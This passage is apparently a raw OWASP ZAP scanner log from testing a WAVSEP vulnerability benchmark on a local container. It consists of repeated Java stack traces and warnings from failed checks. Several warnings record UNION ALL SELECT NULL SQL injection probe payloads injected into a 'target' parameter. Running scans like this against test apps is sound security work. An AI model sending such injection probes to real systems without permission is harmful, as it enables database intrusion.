org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680793 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680793 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680795 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680795 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680796 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680797 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680798 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680799 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680799 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680800 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680801 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680802 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at 